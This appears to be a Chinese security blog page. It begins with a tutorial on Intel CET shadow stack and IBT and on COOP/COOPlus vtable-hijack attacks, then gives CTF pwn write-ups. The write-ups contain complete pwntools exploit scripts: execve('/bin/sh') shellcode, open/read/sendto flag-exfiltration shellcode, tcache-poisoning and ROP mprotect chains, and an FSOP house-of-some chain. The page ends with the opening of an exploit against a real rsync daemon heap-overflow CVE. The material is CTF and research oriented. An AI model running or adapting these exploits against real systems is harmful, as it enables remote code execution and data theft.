包含关键字 CVE 的文章

Intel CET

Intel CET(Controlflow Enforcement Technology / 控制流加固技术)CFI(Control Flow Integrity / 控制流完整性)检查是近些年兴起的保护机制,其中包含 SHSTK(SHadow STacK)和 IBT(Indirect Branch Tracking),Intel Tiger Lake(11 代)及以上 CPU 才支持。

SHSTK 是一种后向控制流完整性(Backward-edge CFI)检查(简单来说是在“返回”时的检查),一般需要硬件支持。程序运行时在不同内存映射中同时维护两个调用栈,一个是众所周知的栈区,另一个是新增的“影子栈”,只存储返回地址。CPU 在过程调用与返回时将同时操作两个栈,如果在返回时发现正常调用栈的返回地址与影子栈中的不同就产生异常。这样一来只通过栈缓冲区溢出等方式修改栈上函数返回值以劫持控制流的方式就失效了,也就是所有 ROP 攻击都将失效

IBT 是一种前向控制流完整性(Forward-edge CFI)检查(简单来说是在“调用”时的检查)。CPU 每当执行间接调用及跳转时都检查目标的指令是否为 endbr64/32,如果是就不执行任何操作(类似 nop),如果不是就产生异常。这样一来大幅削弱了 COP / JOP 攻击。Forward-edge CFI 可以在软件层面模拟,例如 Windows CFG、Clang CFI 等,但是会大幅降低程序性能,每次虚函数调用等都需要校验,实用价值有限。

目前 Windows 只支持 Shadow Stack(Windows CFG),还不支持以 endbr 指令为基础的 IBT(存疑,Windows 我不熟);Linux 上也几乎没有程序启用这项保护,算是高度实验性的功能吧。不过 SHSTK 保护很可能在未来成为继 RELRO、Stack Canary、NX、ASLR (PIE) 后又一项常见的用户态保护机制。下文即将提到的 COOP 攻击对于未来的 Pwner 可能也会是像 ROP 一样必学的攻击方式?(Hackergame 2024 中有一道开启了 SHSTK 和 IBT 的 Pwn 题,但好像没开 ASLR,解法是直接篡改 shadow stack 本身再 ROP。)

验证 Intel CET 是否可用

接下来是在 Linux 上实验启用 CET 的具体操作,主要是 Shadow Stack。首先需要内核启用 CET 特性,Linux 6.2 默认启用 IBTLinux 6.6 正式合并 SHSTK。在命令行中验证启用状态:

$ sudo dmesg | grep CET
[    0.111658] CET detected: Indirect Branch Tracking enabled
$ cat /proc/cpuinfo | grep shstk
flags           : ... user_shstk ...
$ cat /proc/cpuinfo | grep ibt
flags           : ... ibt ...

验证某程序是否在编译时启用 CET:

$ readelf -n <application> | grep -a SHSTK
      Properties: x86 feature: IBT, SHSTK
$ readelf -n <application> | grep -a IBT
      Properties: x86 feature: IBT, SHSTK

GCC / glibc 环境启用 Intel CET

Glibc 已经在其 ld.so 中初步支持 Intel CET 保护。

我的环境:

CPU: 13th Gen Intel(R) Core(TM) i7-13700H (20) @ 5.00 GHz
Kernel: 6.14.7-zen2-1-zen (archlinux)
glibc: GNU C Library (GNU libc) stable release version 2.41

如果自己的电脑没有 Intel CET 软硬件支持,推荐使用 eqqie 学长开发的 qemu 插件(github)。我的电脑由于恰好满足所有条件,所以我图方便直接实机测试了比较粗暴。开虚拟环境总是对的。

编译时

使用 gcc 编译时添加以下编译参数:

gcc -fcf-protection=full

运行时

目前 glibc 动态链接器 ld.so 默认不启用 Intel CET 特性(见源码),需要设置以下环境变量以强制启用:

GLIBC_TUNABLES=glibc.cpu.x86_shstk=on:glibc.cpu.x86_ibt=on:glibc.cpu.hwcaps=IBT,SHSTK
将以上环境变量中 on 改为 permissive 可以以更兼容的方式启用 CET(SHSTK / IBT),当程序本身或其动态链接库不支持 CET 特性时,动态链接器将自动关闭 CET。

保护效果

编写这样一个简单的 C 程序:

# File: test_cet.c

#include <stdio.h>

int main(void) {
  puts("Hello, shadow stack!");
  return 0;
}

编译运行:

$ gcc -fcf-protection=branch test_cet.c -o test_cet
$ GLIBC_TUNABLES=glibc.cpu.x86_shstk=on:glibc.cpu.x86_ibt=on:glibc.cpu.hwcaps=IBT,SHSTK ./test_cet
Hello, shadow stack!

程序正常输出,但这并不是重点。接下来使用 gdb + pwndbg 调试验证 Shadow Stack 确实已启用:

$ gdb ./a.out
pwndbg> r
...
pwndbg> set environment GLIBC_TUNABLES=glibc.cpu.x86_shstk=on:glibc.cpu.x86_ibt=on:glibc.cpu.hwcaps=IBT,SHSTK
pwndbg> start
...
pwndbg> vmmap
...
0x7ffff7400000     0x7ffff7c00000 rw-p   800000      0 [anon_7ffff7400]
...
pwndbg> b _IO_file_write
...
pwndbg> c
...
pwndbg> tele 0x7ffff7bff000 1000
00:0000│  0x7ffff7bff000 ◂— 0
... ↓     496 skipped
1f1:0f88│  0x7ffff7bfff88 —▸ 0x7ffff7e99aac (sbrk+108) ◂— test eax, eax
1f2:0f90│  0x7ffff7bfff90 —▸ 0x7ffff7e252e6 (__default_morecore+22) ◂— cmp rax, -1
1f3:0f98│  0x7ffff7bfff98 —▸ 0x7ffff7e2622b (sysmalloc+1019) ◂— mov r10, qword ptr [rbp - 0x50]
1f4:0fa0│  0x7ffff7bfffa0 —▸ 0x7ffff7e27435 (_int_malloc+3413) ◂— mov rcx, qword ptr [rbp - 0x38]
1f5:0fa8│  0x7ffff7bfffa8 —▸ 0x7ffff7e27435 (_int_malloc+3413) ◂— mov rcx, qword ptr [rbp - 0x38]
1f6:0fb0│  0x7ffff7bfffb0 —▸ 0x7ffff7e28002 (malloc+434) ◂— test rax, rax
1f7:0fb8│  0x7ffff7bfffb8 —▸ 0x7ffff7e012fd (_IO_file_doallocate+173) ◂— mov eax, 1
1f8:0fc0│  0x7ffff7bfffc0 —▸ 0x7ffff7e0d2dd (new_do_write+93) ◂— movzx edi, word ptr [rbx + 0x80]
1f9:0fc8│  0x7ffff7bfffc8 —▸ 0x7ffff7e0e191 (_IO_do_write+33) ◂— cmp rbx, rax
1fa:0fd0│  0x7ffff7bfffd0 —▸ 0x7ffff7e0e70b (_IO_file_overflow+283) ◂— cmp eax, -1
1fb:0fd8│  0x7ffff7bfffd8 —▸ 0x7ffff7e03dba (puts+474) ◂— cmp eax, -1
1fc:0fe0│  0x7ffff7bfffe0 —▸ 0x555555555160 (main+23) ◂— mov eax, 0
1fd:0fe8│  0x7ffff7bfffe8 —▸ 0x7ffff7da8e08 (__libc_start_call_main+120) ◂— mov edi, eax
1fe:0ff0│  0x7ffff7bffff0 —▸ 0x7ffff7da8ecc (__libc_start_main+140) ◂— mov r14, qword ptr [rip + 0x1c10a5]
1ff:0ff8│  0x7ffff7bffff8 —▸ 0x555555555075 (_start+37) ◂— hlt 
pwndbg> bt
#0  _IO_new_file_write (f=0x7ffff7f6b5c0 <_IO_2_1_stdout_>, data=0x5555555592a0, n=18) at fileops.c:1174
#1  0x00007ffff7e0d2dd in new_do_write (fp=0x7ffff7f6b5c0 <_IO_2_1_stdout_>, data=0x5555555592a0 "Hello, Intel CET!\n", 
    to_do=to_do@entry=18) at /usr/src/debug/glibc/glibc/libio/libioP.h:1030
#2  0x00007ffff7e0e191 in _IO_new_do_write (fp=fp@entry=0x7ffff7f6b5c0 <_IO_2_1_stdout_>, data=<optimized out>, to_do=18) at fileops.c:426
#3  0x00007ffff7e0e70b in _IO_new_file_overflow (f=0x7ffff7f6b5c0 <_IO_2_1_stdout_>, ch=10) at fileops.c:784
#4  0x00007ffff7e03dba in __GI__IO_puts (str=0x555555556004 "Hello, Intel CET!") at ioputs.c:41
#5  0x0000555555555160 in main ()
#6  0x00007ffff7da8e08 in __libc_start_call_main (main=main@entry=0x555555555149 <main>, argc=argc@entry=1, 
    argv=argv@entry=0x7fffffffe2f8) at ../sysdeps/nptl/libc_start_call_main.h:58
#7  0x00007ffff7da8ecc in __libc_start_main_impl (main=0x555555555149 <main>, argc=1, argv=0x7fffffffe2f8, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe2e8) at ../csu/libc-start.c:360
#8  0x0000555555555075 in _start ()

可以看到程序运行时多出一个较大的匿名内存区域,这就是 Shadow Stack。在一个 glibc 中调用层级较深的函数下断点,可以看到 Shadow Stack 中存储了逐层函数返回地址(调用栈),与 back trace 相符。

我们可以试试在 SHSTK 开启时栈溢出修改栈上返回地址劫持控制流是否还有效。

#include <stdio.h>

int main() {
    char buf[0x10];
    gets(buf);
    return 0;
}
$ gcc -fcf-protection=full --ansi -fno-stack-protector main.c
pwndbg> r
Starting program: /home/rik/Desktop/a.out 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
aaaaaaaaaaaaaaaaaaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
0x0000555555555167 in main ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
──[ REGISTERS / show-flags off / show-compact-regs off ]──
 RAX  0
 RBX  0
 RCX  0x7ffff7f6c7c0 ◂— 0
 RDX  0x7ffff7f6c7c0 ◂— 0
 RDI  0x7fffffffe151 ◂— 'aaaaaaaaaaaaaaaaaaaaaaa'
 RSI  0x5555555592a1 ◂— 'aaaaaaaaaaaaaaaaaaaaaaa\n'
 R8   0x5555555592b9 ◂— 0
 R9   0xfbad2288
 R10  0
 R11  0x202
 R12  0x7fffffffe288 —▸ 0x7fffffffe658 ◂— '/home/rik/Desktop/a.out'
 R13  1
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe310 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0x555555557dd8 —▸ 0x5555555550f0 ◂— endbr64 
 RBP  0x6161616161616161 ('aaaaaaaa')
 RSP  0x7fffffffe168 —▸ 0x7ffff7dab600 ◂— cmp al, 0xff
 RIP  0x555555555167 (main+30) ◂— ret 
──[ DISASM / x86-64 / set emulate on ]──
 ► 0x555555555167 <main+30>    ret                                <0x7ffff7dab600>
     ↓
   0x7ffff7dab600              cmp    al, 0xff     0x0 - 0xff     EFLAGS => 0x213 [ CF pf AF zf sf IF df of ]
...
pwndbg> xinfo 0x7ffff7dab600
Extended information for virtual address 0x7ffff7dab600:

  Containing mapping:
    0x7ffff7da8000     0x7ffff7f18000 r-xp   170000  24000 /usr/lib/libc.so.6

可以看到程序在 ret 处就已经产生段错误,连 RIP 都还不是篡改后的地址。

用户态的 Shadow Stack 目前依旧是实验性的功能,在我自己电脑上测试,设置上述环境变量(on)后连 gdb 都打不开了...

Fatal signal: 段错误
----- Backtrace -----
0x5ef6d4be903e ???
0x5ef6d4d107c0 ???
0x5ef6d4d109bb ???
0x746656c4c1cf ???
0x7466508bf125 ???
---------------------
A fatal error internal to GDB has been detected, further
debugging is not possible.  GDB will now terminate.

This is a bug, please report it.  For instructions, see:
<https://www.gnu.org/software/gdb/bugs/>.

fish: Job 1, 'GLIBC_TUNABLES=glibc.cpu.x86_sh…' terminated by signal SIGSEGV (Address boundary error)

Linux 用户态启用 SHSTK 底层实现

Linux 用户态动态开关 Shadow Stack 主要依赖 arch_prctl 系统调用:

arch_prctl(ARCH_SHSTK_ENABLE, unsigned long feature)
    启用‘feature’指定的特性。一次只能操作一个特性。

arch_prctl(ARCH_SHSTK_DISABLE, unsigned long feature)
    关闭‘feature’指定的特性。一次只能操作一个特性。

arch_prctl(ARCH_SHSTK_LOCK, unsigned long features)
    锁定特性的启用或关闭状态。‘features’ 是所有需要锁定的特性的遮罩(按位或)。没有按位或设定的特性的锁定状态不变,之后无法再启用或关闭已锁定的特性。

arch_prctl(ARCH_SHSTK_UNLOCK, unsigned long features)
    锁定特性。‘features’ 是所有需要解锁的特性的遮罩。没有按位或设定的特性的锁定状态不变。只能在 ptrace 时使用。

arch_prctl(ARCH_SHSTK_STATUS, unsigned long addr)
    将当前启用的特性拷贝到 addr 地址处。特性启用状态描述方式同上述用法中传入的 ‘features’。

可指定的特性:
    ARCH_SHSTK_SHSTK - Shadow stack
    ARCH_SHSTK_WRSS  - WRSS

Glibc 动态链接器 ld.so 中有关启用 SHSTK 的源码sysdeps/unix/sysv/linux/x86_64/dl-cet.h):

/* 用宏启用 shadow stack 以避免调用栈下溢。(刚启用时 shadow stack 为空,此时若返回将触发保护。)*/
#define ENABLE_X86_CET(cet_feature)                \
  if ((cet_feature & GNU_PROPERTY_X86_FEATURE_1_SHSTK))        \
    {                                \
      long long int kernel_feature = ARCH_SHSTK_SHSTK;        \
      INTERNAL_SYSCALL_CALL (arch_prctl, ARCH_SHSTK_ENABLE,    \
                 kernel_feature);            \
    }

#define X86_STRINGIFY_1(x)    #x
#define X86_STRINGIFY(x)    X86_STRINGIFY_1 (x)

/* 如果已在 GL(dl_x86_feature_1) 启用,则在调用 _dl_init 前启用 shadow stack。调用 _dl_setup_x86_features 以初始化 shadow stack。*/
#define RTLD_START_ENABLE_X86_FEATURES \
"\
    # 检查 shadow stack 是否已在 GL(dl_x86_feature_1) 启用。\n\
    movl _rtld_local+" X86_STRINGIFY (RTLD_GLOBAL_DL_X86_FEATURE_1_OFFSET) "(%rip), %edx\n\
    testl $" X86_STRINGIFY (X86_FEATURE_1_SHSTK) ", %edx\n\
    jz 1f\n\
    # 如果在 GL(dl_x86_feature_1) 中启用,启用 shadow stack。\n\
    movl $" X86_STRINGIFY (ARCH_SHSTK_SHSTK) ", %esi\n\
    movl $" X86_STRINGIFY (ARCH_SHSTK_ENABLE) ", %edi\n\
    movl $" X86_STRINGIFY (__NR_arch_prctl) ", %eax\n\
    syscall\n\
1:\n\
    # 将 GL(dl_x86_feature_1) 传参给 _dl_cet_setup_features。\n\
    movl %edx, %edi\n\
    # 为调用 _dl_cet_setup_features 对齐栈指针。\n\
    andq $-16, %rsp\n\
    call _dl_cet_setup_features\n\
    # 从 %r12 和 %r13 恢复 %rax 和 %rsp。\n\
    movq %r12, %rax\n\
    movq %r13, %rsp\n\
"

所以其实可以这样手动在程序中使用 shadow stack 而无需依赖 glibc ld.so(注意要使用宏函数,原因见上方源码中注释):

#include <stdio.h>

#define ENABLE_SHSTK                                                           \
    asm("mov $0x5001, %rdi;"                                                   \
        "mov $0x1, %rsi;"                                                      \
        "mov $158, %rax;"                                                      \
        "syscall;");

#define DISABLE_SHSTK                                                          \
    asm("mov $0x5002, %rdi;"                                                   \
        "mov $0x1, %rsi;"                                                      \
        "mov $158, %rax;"                                                      \
        "syscall;");

int main(void) {
    ENABLE_SHSTK
    
    // ...
    
    DISABLE_SHSTK // 或者直接 exit(0);
    return 0;
}

SHSTK 内核底层实现

arch_prctl 在处理 SHSTK 相关操作时会转到 shstk_prctl,SHSTK 的主要逻辑就在 arch/x86/kernel/shstk.c。SHSTK 本身主要由硬件实现,内核只负责检查参数、管理 shadow stack 内存页、通过 wrss 指令设置相关寄存器和异常处理等。

在申请 shadow stack 内存页 do_mmap 时,flags 参数传入了一个新的标志 VM_SHADOW_STACKbootlin),这样 mmap 会额外申请一个保护页(guard page),这个页一旦被读写就会触发异常。Shadow stack 指针(ssp)移动方式有 pushpopincssp 指令,其中 incssp 指令移动 ssp 后会目标地址及相邻的内存,且 ssp 一次最多只能移动 2040 字节。加入 guard page 后可以防止程序通过 incssp 指令将 ssp 移动到用户可控的内存区。

(内核这块目前我还不清楚,以后补充吧。)

Intel CET 启用后的攻击思路

虽然 ROP 被 SHSTK 彻底拿下(😭),但是 IBT 提供的前向控制流保护只检查了跳转的地址是否合法,没考虑这个地址是否被替换。于是我们就有了新的攻击思路。

虚函数表劫持

我在 Mini L-CTF 2025 中恰好出了一道好评率为 0 的虚函数表劫持(virtual table hijack)相关的 Pwn 题(CTFers)。于是把那道题的题解搬到这里。

我们考虑这样的 C++ 程序:

#include <iostream>
#include <vector>

class Base {
  public:
    virtual void func() = 0; // 纯虚函数
};

class A : public Base {
    void func() override { std::cout << "I am A!\n"; }
};

class B : public Base {
    void func() override { std::cout << "I am B!\n"; }
};

int main() {
    std::vector<Base *> objs;

    objs.emplace_back(new A());
    objs.emplace_back(new B());
    for (auto obj : objs) {
        obj->func();
    }
}

// 输出:
// I am A!
// I am B!

AB 继承自 Basestd::vector 存储这两种对象时仅存储其基类对象指针(实际应该使用智能指针)而丢弃了具体的类型信息(A 还是 B?)。然而我们依旧可以直接调用对应类型的虚函数 func,这是因为 C++ 运行时多态特性。大多数编译器实现它的方式是虚函数表,在对象中存储一个虚函数表指针指向存储对应成员函数指针的虚函数表。虚函数被调用时首先从对象里的虚函数表指针指向的虚函数表中取出对应虚函数地址,然后再进行调用:

; rax 为对象地址
mov     rdx, qword [rax]          ; 取虚函数表
mov     rdx, qword [rdx + offset] ; 取虚函数
mov     rdi, rax                  ; 传 this 指针隐式作为首个参数
call    rdx                       ; 虚函数调用

所以,一个包含了虚函数的 C++ 对象的内存布局会是这样:

struct Object {
    void (**vtable)(struct Object *, ...); // 虚函数表指针
    
    /* 对象字段 ... */
};

如果我们能劫持虚函数表指针,指向伪造的虚函数表,其中包含类似 one_gadget 那样的后门函数或者 system 之类。可实际情况我们往往需要拼接多个代码片段达到任意代码执行的效果(用来泄露基址、执行 orw 等)。没有 ROP 的话怎么做到链式“拼接”代码片段呢?这就可以考虑 COOP。

COOP

COOP(Counterfeit Object Oriented Programming / 面向伪对象编程)是一种新的代码重用攻击。其实我们早已见过 COOP 攻击:高版本 glibc 堆利用往往结合 IO_FILE 利用,“打 IO”就是一种原始的 COOP,只是不在 C++ 中。通过篡改 IO_FILE 中某些作为跳表函数参数的字段,篡改 vtable,构造 system("/bin/sh")。然而我们的目标是实现几乎任意代码执行,需要真正的基于 vfgadgets 的 COOP。

Vfgadgets 是 COOP 论文提出的新型 gadgets,由于 SHSTK + IBT,我们能够利用的 gadgets 从 ret 前的代码片段(ROP gadgets)变成了完整的函数——vfgadget。vfgadgets 大致可以分为 Main Loop Gadget(将其他 vfgadgets 串联起来)、Argument Loader Gadget(类似 ROP 中的 pop rdi; ret;)、Invoker Gadget(类似 ROP 中的 system)和 Collector Gadget(存储 Invoker 的结果)。

img

以上是一张关于 COOP 攻击十分经典的配图

搜寻 vfgadgets 的工具(类似 ropper):https://github.com/x86-512/VXpp

我觉得理解 COOP 需要搞清楚这几种 vfgadgets 的来源,以下是高度简化的模型:

// 这个类实际上应该不会生成虚函数,所有 vfgadgets 也不是在同一个类中,只为简化理解。
class Vfgadgets {
    size_t data;              // 数据类型不是重点
    size_t *addr;
    std::vector<Base *> objs; // 也可以是更简单的:Base* objs[N];

    virtual void looper() {
        for (auto obj : objs) {
            obj->func();
        }
    }
    
    virtual void invoker() {
        this->victim_vfunc();
    }
    
    virtual void loader() {
        size_t var;       // 寄存器变量
        var = this->data; // 也可以是 var = *(this->addr) 之类
                          // 总之是从对象写入寄存器
    }

    virtual void collector(size_t arg) {
        this->data = arg; // 也可以是 *(this->addr) = arg; *(this->addr) = 1234; 之类
                          // 总之是从寄存器或立即数写入对象
    }
    
    virtual void victim_vfunc() {
        // 这里的函数体不是重点,反正会被篡改成另一个函数。
    }
};

其实为了给这些 vfgadgets 再分类,原论文用了很多概念和抽象,我写得还是过于不严谨了(应该比较直观吧)。这几种 vfgadgets 中最重要的是 Main Loop Gadget(Looper),它将所有真正有用的 vfgadgets 串联起来,构成链式调用,达到 ROP 不断返回到各种代码片段连成一串的效果。Looper 从当前对象字段中取出类似数组的容器,其中是有虚函数表的对象,并遍历执行每个对象的某个虚函数。这在开启了优化的大型 C++ 程序特别是 GUI 程序中比较常见,比如释放资源时调用虚析构函数,注册/注销事件之类。

COOP 的攻击条件是已知基址且能够伪造对象,例如 UAF 或者堆缓冲区溢出等漏洞,可以控制堆上分配的对象。我们需要伪造的东西有:

  1. Looper 所在对象(类比 FSOP 时篡改 _IO_list_all

    ​ 篡改其某即将被调用的虚函数为来自另一个对象或全局函数 (?) 的 Looper,再篡改这个 Looper 遍历的伪对象容器地址或内容(指针数组)。

  2. Looper 遍历的伪对象(类比 FSOP 时构造 fake files)

    ​ 将会被调用的虚函数改为其他三种 vfgadgets。

一旦 Looper 被调用,它就会逐个执行容器中一连串伪对象中的 vfgadgets。如果没有 IBT 只有 SHSTK 保护的话,那应该就可以直接把 ROP gadgets 当作 vfgadgets,只是这些 gadgets 不由 ret“触发”而是直接被 call,理应实现任意代码执行。如果开启了 IBT 就更加困难了,毕竟只能执行完整的函数 (?),而不是 ret 前的代码片段,不过依旧能够实现攻击。(据说 COOP 和 ROP 一样是图灵完备的,具体分析过程我还没看明白。)

这种玩法好像在哪里见过?

  • Glibc IO_FILE 利用中有种类似的手法 FSOP。FSOP 通过 _chain 链接任意读写原语,遍历 _IO_list_all_IO_flush_all 可以看作 looper。
  • 很像篡改 glibc ld.so _rtld_global 伪造 fini_arrayfini_array 类似那个容器,不过里面存的直接就是 vfgadgets,那么负责遍历调用 fini_array 中函数的 __run_exit_handlers 就像是 looper 了。

COOPlus 原论文的 presentation 里面有很多配图值得一看。

COOPlus

简单地通过修改虚函数表指针劫持虚函数表早就有了对应的保护措施,例如 gcc 的 virtual table verification(VTV)。虚函数表中会有一个类似 stack canary 的 magic number,在调用虚函数前会先校验虚函数表指针,虚函数表指针一定要指向虚函数表 ✍。我们熟悉的 glibc IO 也会检查 IO_FILE_plus 虚函数表指针 vtable,不过那是通过地址范围来检查。由于虚函数表一般都在只读段,所以不容易篡改。

然而如果我们在整个利用过程中所有虚函数表指针都合法呢?也就是只是将某个对象的虚函数表指针更换为另一个对象的。由于不同类的虚函数表往往放在一起,只需篡改虚函数表指针低位,无需泄露基址就可能更换虚函数表,从而实现越界修改对象字段等简单操作。这就是 COOPlus。COOPlus 主要用来扩大攻击面,通过 vfgadgets 篡改对象中的关键字段(例如权限等级、缓冲区长度等)从而进一步利用。

COOPlus 原论文设计了一个工具 VScape,可以自动扫描程序中 COOPlus 攻击原语。论文作者经过测试发现许多大型 C++ 程序都有不少适合 COOPlus 攻击的虚函数。

缓解措施

如果细粒度前向控制流完整性保护启用了的话,每次虚函数调用都要校验函数指针(而非只是表)的签名,那 COOP 应该就废了。不过这样激进的保护应该不太可能大面积应用。

……

参考资料

COOP 原论文

COOPlus / VScape 原论文

Bypassing Intel CET with Counterfeit Objects

CVE-2015-5122: Exploitation Using COOP

《Counterfeit Object-oriented Programming》 论文笔记

签个到吧

执行 shellcode 前清空了寄存器上下文,但在 rdi 保留了 shellcode 基址,于是可以输入 /bin/sh 并执行 syscall execve("/bin/sh", 0, 0),getshell。

io.sendafter(b'strength \n', asm(f'add rdi, 13; mov rax, 59; syscall;') + b'/bin/sh')

好easy嘅题啦

VM 指令 heap 中可以操作堆快,alloc free print input。其中 free 后未置空堆块指针,存在 UAF。首先申请 0x500 大堆块,在其中提前写入之后用到的 shellcode:open read sendto。然后 free 此堆块进入 unsorted bin 并 print 以获取 libc 基址。接着申请 0x60 小堆块,获取其中残留的 tcache next,获取线程 heap 基址。经调试发现 pthreads 为新线程分配的栈与 libc 偏移固定,再利用 UAF double free tcache chunk,tcache poisoning 至线程栈上 heap operation 函数返回地址前 24 字节处,写入ROP 链 mprotect 修改页权限并 ret2shellcode。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './pwn'

p = process(binary)
# io = connect('127.0.0.1', 9999)
io = connect('node.vnteam.cn', 46995)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=None)

io.sendlineafter(b'create? ', b'1\n')

# io = connect('127.0.0.1', 9999)
io = connect('node.vnteam.cn', 46995)
s = 0.5

def heap():
    io.sendline(b'heap 0 0')
    sleep(s)

def alloc(size: int):
    io.sendlineafter(b'Heap operate: ', b'alloc')
    io.sendlineafter(b'Size: ', itob(size))
    sleep(s)

def free():
    io.sendlineafter(b'Heap operate: ', b'free')
    sleep(s)

def printit():
    io.sendlineafter(b'Heap operate: ', b'print')
    sleep(s)

def input(content: bytes):
    io.sendlineafter(b'Heap operate: ', b'input')
    io.sendafter(b'Input: ', content)
    sleep(s)

def AveMujica():
    io.sendline(b'AveMujica 0 0')
    sleep(s)

io.recvuntil(b'Input your Code (end with EOF): ')

for _ in range(13):
    heap()
AveMujica()
io.sendline(b'EOF')

alloc(0x500)
input(p64(0xdeadbeef) * 4 + asm(f"""
    mov rax, 0x67616c662f
    push rax

    mov rax, __NR_open
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall

    mov rax, __NR_read
    mov rdi, 9
    mov rsi, rsp
    mov rdx, 0x50
    syscall

    mov rax, __NR_sendto
    mov rdi, 7
    syscall
    mov rsi, rsp
    
"""))
free()
printit()

io.recvuntil(b'Content: ')
libc.address = u64(io.recv(8)) - 2206944
success(f'libc_base: 0x{libc.address:x}')

alloc(0x60)
free()
printit()

io.recvuntil(b'Content: ')
heap_key = u64(io.recv(8))
success(f'heap_key: 0x{heap_key:x}')

input(b'\x00' * 16)
free()
input(p64((libc.address - 980792 - 24) ^ heap_key))
alloc(0x60)
# gdb.attach(p, 'set resolve-heap-via-heuristic force\nb *$rebase(0xB2F9)')
alloc(0x60)
input(p64(0xcafebabe) * 3 + flat([
    libc.search(asm('pop rdi;ret')).__next__(),
    heap_key << 12,
    libc.search(asm('pop rsi;ret')).__next__(),
    0x1000,
    libc.search(asm('pop rdx;pop r12;ret')).__next__(),
    7,
    0,
    libc.sym['mprotect'],
    (heap_key << 12) + 1888
]))

io.interactive()

p.wait()

由于 lib 加载顺序不同,远程和本地的线程栈与 libc 偏移不同,需要在 docker container 中调试获取。

米塔调试机

输入指令时使用 scanf %s,可以溢出修改栈上 nowhomenowver,在 name 中构造假 MitaHome 和 Version 堆结构,将 nowhomenowver 劫持到对应位置,即可在 $delete 命令时构造任意 free。在此之前大量创建新 MitaHome 并在 ID 字段填入 0x601 和 0x41 构造假 unsorted 大小堆块,利用任意 free 获取 unsorted chunk 泄漏 libc 基址。然后同样方法 double free tcache poisoning,修改 _IO_list_allname 处,程序正常 exithouse of Some_IO_flush_all 时利用 IO wide_data 任意读写,利用 environ 泄漏栈基址,栈上 ROP)。

Exp:

#!/usr/bin/python

from pwn import *
from ctypes import *

itob = lambda x: str(x).encode()

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './vuln6'

# io = process(binary)
io = connect('node.vnteam.cn', 47984)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=None)

# gdb.attach(io, '')

io.sendlineafter(b'name:\n', cyclic(0x200))
io.sendlineafter(b'>>> ', b'$show')
io.recvuntil(b'caaf')
heap_base = u32(io.recv(4)) - 672
success(f'heap_base: 0x{heap_base:x}')

io.sendlineafter(b'>>> ', f'aaaa-1_\x01\x06:aaaa')
for i in range(25):
    io.sendlineafter(b'>>> ', f'aaaa{i}_\x41:aaaa')

name = 0x4040E0

fake_heap  = p64(0) + p64(0x41) + p64(0) * 3 + p64(ord('1')) + p64(name + 0x10 + 0x40 * 2) + p64(name + 0x10 + 0x40)
fake_heap += p64(0) + p64(0x41) + cyclic(0x30)
fake_heap += p64(0) + p64(0x41) + p64(0) * 3 + p64(ord('1')) + p64(0) + p64(heap_base + 832)
fake_heap += p64(0) + p64(0x41) + cyclic(0x20) + p64(name + 0x10) + p64(0)

io.sendlineafter(b'>>> ', b'$name')
io.sendafter(b'name:\n', fake_heap)
io.sendlineafter(b'>>> ', b'$delete\x00'.ljust(1344, b'a') + p64(name + 0x10 + 0x40 * 2) + p64(name + 0x10 + 0x40 * 3))

io.sendlineafter(b'>>> ', b'$show\x00'.ljust(1344, b'a') + p64(heap_base + 832) + p64(name + 0x10 + 0x40 * 3))
0x1140a340
io.recvuntil(b'Now MiTaHome: ')
libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 2206944
success(f'libc_base: 0x{libc.address:x}')

io.sendlineafter(b'>>> ', b'$name')
io.sendafter(b'name:\n', p64(0) + p64(0x41) + p64(0) * 3 + p64(ord('1')) + p64(0) + p64(name + 0x10 + 0x40) + p64(0) + p64(0x41) + cyclic(0x30) + p64(0) + p64(0x41) + cyclic(0x20) + p64(name + 0x10) + p64(0) * 2 + p64(0x41))
io.sendlineafter(b'>>> ', b'$delete\x00'.ljust(1344, b'a') + p64(name + 0x10) + p64(name + 0x10 + 0x40 * 2))

io.sendlineafter(b'>>> ', b'$name')
io.sendafter(b'name:\n', p64(0) + p64(0x41) + p64(libc.sym['_IO_list_all'] ^ 0x404) + p64(0) * 2 + p64(ord('1')) + p64(0) + p64(name + 0x10 + 0x40) + p64(0) + p64(0x41) + cyclic(0x30) + p64(0) + p64(0x41) + cyclic(0x20) + p64(name + 0x10) + p64(0) * 2 + p64(0x41))

io.sendlineafter(b'>>> ', b'mitaname_mitaid:vername')
io.sendlineafter(b'>>> ', p32(name)[:-1] + b'_mitaid:vername')

from SomeofHouse import HouseOfSome
hos = HouseOfSome(libc=libc, controled_addr=(heap_base) + 0x1000)
payload = hos.hoi_read_file_template((heap_base) + 0x1000, 0x400, (heap_base) + 0x1000, 0)
io.sendlineafter(b'>>> ', b'$name')
io.sendafter(b'name:\n', payload)

io.sendlineafter(b'>>> ', b'$exit')
io.recvuntil(b'Player out! :(\n')
hos.bomb_orw(io, b'/flag', offset=1816, read_length=128)

io.interactive()

虽然提示说有要用到可以无限长输入的指令格式,但其实只要空字节截断字符串就好?

某天在 archlinux 主页看到建议立即更新 Rsync 的警告,看了下感觉复现难度不高,于是来试试。

Rsync 版本 31.0,采用默认配置 ftp 模式。远程服务器上随便放一个 libc.so.6 文件作为测试(文件本身是什么不重要,但是要稍大一些)。

漏洞的具体分析在 Google 的这篇文章写得很清楚,我就不赘述了。简单来说就是在 rsync daemon 文件同步过程中,客户端上传用于比对文件是否一致的校验和 sum2 时,用于控制其长度的 s2length 用户可控且最大值大于 sum2 缓冲区长度。(怀疑是某次更新时被杂乱的宏定义搞晕了)伪造 s2length 即可构造最长 48 字节的堆上缓冲区溢出,威力极强。

    #!/usr/bin/python
    
    from pwn import *
    
    context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
    binary = './rsync'
    
    io = connect('127.0.0.1', 873) # 远程服务器 rsync --daemon
    e = ELF(binary)
    libc = ELF('/usr/lib/libc.so.6', checksec=None)
